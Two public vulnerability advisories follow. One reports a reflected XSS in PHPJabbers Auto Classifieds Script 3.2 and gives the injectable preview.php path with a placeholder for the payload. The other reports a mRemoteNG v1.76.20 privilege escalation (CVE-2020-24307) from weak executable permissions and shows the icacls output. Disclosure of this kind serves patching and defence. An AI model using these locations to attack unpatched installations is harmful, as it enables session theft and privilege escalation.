<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Auto Classifieds Script 3.2 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /preview.php/<br /><br />URL parameter vulnerable to XSS<br /><br />/preview.php/[XSS]?controller=pjListings&action=pjActionSearch<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>mRemoteNG mRemoteNG v1.76.20 Privilege Escalation<br /><br /><br />Detailed Information<br />------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />Product Name: mRemoteNG<br />Vendor Home Page: https://mremoteng.org<br />Vulnerable Version: mRemoteNG v1.76.20<br />Fixed Version: mRemoteNG v1.76.20.24615<br />Vulnerability Type: Improper Access Control (CWE-284)<br />CVE Reference: CVE-2020-24307<br />Author of Advisory: Thurein Soe<br /><br />------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /><br />Product Description:<br /><br />mRemoteNG is an open-source multi-protocol, remote connections manager for<br />Windows that allows managing multiple diverse connections with remote<br />systems.<br />------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />Vulnerability description:<br /><br />Windows service permissions is a type of local privilege escalation in the<br />windows operating system. Weak service permissions run with system user<br />permission that allows a standard user to elevate to administrator<br />privilege on the compromised system upon successfully modifying the<br />service. mRemoteNG.exe was giving modify permission to any authenticated<br />users in the windows operating system that allows standard users to modify<br />the service resulting in leading Privilege Escalation.<br /><br />C:\Users\NyaMeeEain>icacls "C:\Program Files (x86)\mRemoteNG\mRemoteNG.exe"<br />C:\Program Files (x86)\mRemoteNG\mRemoteNG.exe APPLICATION PACKAGE<br />AUTHORITY\ALL APPLICATION PACKAGES:(M)<br />BUILTIN\Users:(M)<br />APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(M)<br />NT AUTHORITY\SYSTEM:(I)(F)<br />BUILTIN\Administrators:(I)(F)<br />BUILTIN\Users:(I)(RX)<br />APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)<br />------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />References:<br />https://www.immuniweb.com/vulnerability/improper-access-control.html<br />https://www.cvedetails.com/cwe-details/284/Access-Control-Authorization-Issues.html<br />------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />Credits:<br />Thurein Soe<br />------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /></code></pre>